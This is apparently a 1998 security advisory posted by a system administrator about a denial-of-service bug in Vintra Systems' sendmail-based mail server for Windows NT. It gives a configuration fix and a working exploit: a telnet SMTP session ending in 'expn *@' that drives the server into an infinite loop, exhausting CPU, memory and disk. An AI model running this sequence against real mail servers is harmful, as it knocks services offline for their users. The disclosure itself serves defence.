vintra.txt

`From: Vytis Fedaravicius <[email protected]>  
Subject: DOS in Vintra systems Mailserver software.  
  
Hello,  
  
There is a bug in a free MailServer software for Windows NT from Vintra  
systems ( http://www.vintra.com/mailsrvr.html ). Any remote user can cause  
MTA to go nuts and make CPU ussage up to 99%, eat all available memory and  
disk space.  
  
Bug: one opens telnet to 25 port, issues helo, mail from: and rcpt to:  
commands, and instead of data command uses expn *@. Softwarre goes in a  
infinite loop.  
  
Fix: disable expn command by editing sendmail.cf. Add the folowing line  
and restart mta service.  
  
O PrivacyOptions=needmailhelo, noexpn  
  
  
Exploit (commands to enter are marked ">")  
  
>telnet vulnerable.server.dom 25  
  
220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998  
20:18:20 +0200 (Central Europe Daylight Time)  
  
>helo EvilOne  
  
250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet  
you  
  
>mail from:bad.boy  
  
250 bad.boy... Sender ok  
  
>rcpt to:resourceLeaker  
  
550 resourceLeaker... User unknown  
  
>expn *@  
  
550 *@... User unknown  
550 bad.boy... User unknown  
550 bad.boy... User unknown  
...hundreds of these lines gets logged and memory is allocated, cpu ussage  
increases wildly  
  
550 bad.boy... User unknown  
550 bad.boy... User unknown  
....  
  
This software is sendmail based, so may be other implementations are  
vulnerable also? Vintra systems were notified  
  
  
Vytis Fedaravicius  
System administrator  
Omnitel  
  
e-mail: [email protected]  
`